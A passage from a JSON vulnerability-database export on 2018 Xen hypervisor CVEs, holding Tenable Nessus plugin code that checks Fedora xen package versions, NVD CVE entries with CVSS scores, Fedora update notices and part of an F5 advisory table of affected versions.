update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-dbebca30d0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-10472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"xen-4.10.0-9.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:22:09", "description": "Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 6.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-05-14T00:00:00", "title": "Fedora 26 : xen (2018-eb69078020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472"], "modified": "2018-05-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-EB69078020.NASL", "href": "https://www.tenable.com/plugins/nessus/109746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2018-eb69078020.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109746);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\");\n script_xref(name:\"FEDORA\", value:\"2018-eb69078020\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"Fedora 26 : xen (2018-eb69078020)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-eb69078020\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2018/05/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"xen-4.8.3-4.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:52:23", "description": "An issue was discovered in Xen through 4.10.x allowing x86 PV guest OS users to cause a denial of service (out-of-bounds zero write and hypervisor crash) via unexpected INT 80 processing, because of an incorrect fix for CVE-2017-5754.", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-04-27T15:29:00", "title": "CVE-2018-10471", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": 
"AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10471"], "modified": "2018-10-31T10:30:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10471", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:23", "description": "An issue was discovered in Xen through 4.10.x allowing x86 HVM guest OS users (in certain configurations) to read arbitrary dom0 files via QMP live insertion of a CDROM, in conjunction with specifying the target file as the backing file of a snapshot.", "edition": 6, "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-04-27T15:29:00", "title": "CVE-2018-10472", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10472"], "modified": "2018-10-31T10:30:00", "cpe": ["cpe:/o:xen:xen:4.10.1", 
"cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10472", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:x86:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered in Xen through 4.10.x allowing x86 HVM guest OS users to cause a denial of service (unexpectedly high interrupt number, array overrun, and hypervisor crash) or possibly gain hypervisor privileges by setting up an HPET timer to deliver interrupts in IO-APIC mode, aka vHPET interrupt injection.", "edition": 7, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-05-10T23:29:00", "title": "CVE-2018-10982", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10982"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10982", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10982", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:x86:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered in Xen through 4.10.x allowing x86 HVM guest OS users to cause a denial of service (host OS infinite loop) in situations where a QEMU device model attempts to make invalid transitions between states of a request.", "edition": 7, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-05-10T22:29:00", "title": "CVE-2018-10981", "type": "cve", "cwe": ["CWE-835"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10981"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10981", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10981", "cvss": {"score": 4.9, 
"vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:43", "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. 
OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-08T18:29:00", "title": "CVE-2018-8897", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8897"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:citrix:xenserver:7.4", "cpe:/o:synology:diskstation_manager:6.1", "cpe:/o:synology:diskstation_manager:6.0", "cpe:/a:citrix:xenserver:7.2", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/o:redhat:enterprise_virtualization_manager:3.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:synology:diskstation_manager:5.2", "cpe:/a:citrix:xenserver:7.0", "cpe:/o:xen:xen:-", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:citrix:xenserver:7.3", "cpe:/a:citrix:xenserver:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:citrix:xenserver:6.2.0", "cpe:/a:citrix:xenserver:7.1", "cpe:/a:synology:skynas:-", "cpe:/o:canonical:ubuntu_linux:14.04", 
"cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-8897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8897", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:citrix:xenserver:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:-:*:*:*:*:*:x86:*", "cpe:2.3:a:citrix:xenserver:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_virtualization_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-05-26T20:47:24", "published": "2018-05-26T20:47:24", "id": "FEDORA:6CE076015F62", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-3.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-06-29T08:43:54", "published": "2018-06-29T08:43:54", "id": "FEDORA:6E66862A5C82", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-4.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-3639", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-07-03T16:56:43", "published": "2018-07-03T16:56:43", "id": "FEDORA:6A9A16095B29", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-5.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-15468", "CVE-2018-15469", "CVE-2018-15470", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-08-30T04:57:39", "published": "2018-08-30T04:57:39", "id": "FEDORA:E5291607602A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-6.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-15468", "CVE-2018-15469", "CVE-2018-15470", "CVE-2018-18883", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-11-11T03:12:54", "published": "2018-11-11T03:12:54", "id": "FEDORA:37B8362B00D0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.2-2.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-15468", "CVE-2018-15469", "CVE-2018-15470", "CVE-2018-18883", "CVE-2018-19961", "CVE-2018-19962", "CVE-2018-19965", "CVE-2018-19966", "CVE-2018-19967", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2019-03-21T21:09:08", "published": "2019-03-21T21:09:08", "id": "FEDORA:5267F604C2BD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.3-2.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2020-04-06T22:39:41", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "\nF5 Product Development has assigned ID 719554 (BIG-IP), ID 719747 (BIG-IQ and F5 iWorkflow), and ID 719744 (Enterprise Manager) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H17403481 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 | 14.1.0 \n14.0.0.3 | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n13.x | 13.0.0 - 13.1.1 | 13.1.1.2 \n12.x | 12.1.0 - 12.1.3 | 12.1.3.7 \n11.x | 11.6.0 - 11.6.3 \n11.2.1 - 11.5.8 | 11.6.3.3 \n11.5.9 \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nBIG-IQ Centralized Management | 6.x | 6.0.0 - 6.0.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 
5.0.0 - 5.1.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the 